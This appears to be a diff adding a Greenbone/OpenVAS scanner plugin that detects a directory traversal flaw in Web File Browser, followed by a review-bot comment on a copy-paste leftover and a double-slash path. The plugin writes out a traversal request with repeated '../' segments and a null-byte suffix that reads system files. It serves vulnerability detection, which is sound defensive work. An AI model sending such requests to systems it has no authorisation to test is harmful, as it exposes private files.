+  http://xforce.iss.net/xforce/xfdb/71131
+  http://www.exploit-db.com/exploits/18070/
+  http://www.securityfocus.com/bid/50508/exploit ";
+
+  script_description(desc);
+  script_summary("Check for file download vulnerability in Web File Browser");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+##
+## The script code starts here
+##
+
+include("http_func.inc");
+include("host_details.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+foreach dir (make_list("/webFileBrowser", "/webfilebrowser", "/",  cgi_dirs()))
+{
+  ## Send and Receive the response
+  sndReq = http_get(item:string(dir, "/webFileBrowser.php"), port:port);
+  rcvRes = http_send_recv(port:port, data:sndReq);
+
+  ## Confirm application is  NetArt Media Car Portal
+  if("<title>Web File Browser" >< rcvRes)
+  {
+    ## traversal_files() function Returns Dictionary (i.e key value pair)
+    ## Get Content to be checked and file to be check
+    files = traversal_files();
+
+    foreach file (keys(files))
+    {
+      ## Construct directory traversal attack
+      url = string(dir, "/webFileBrowser.php?act=download&subdir=&sortby=name&file=",
+                           crap(data:"../",length:6*9),files[file],"%00");
+
+      ## Confirm exploit worked properly or not
+      if(http_vuln_check(port:port, url:url,pattern:file))
+      {
+        security_hole(port:port);
+        exit(0);
+      }
+    }
+  }
+}
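Review bot: The comment on L829, `## Confirm application is  NetArt Media Car Portal`, is a copy-paste leftover from another plugin; the match below it is `<title>Web File Browser`, so it should read `## Confirm application is Web File Browser`. The `"/"` entry in the directory list on L823 yields `//webFileBrowser.php` once concatenated on L826 and again on L839; whether `http_get` normalises the double slash I can't tell from here, so using `""` for the root entry would be safer. The body of the `foreach dir` loop also uses `http_send_recv` for the detection request and `http_vuln_check` for the confirmation, which is fine but worth a one-line comment if intentional.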


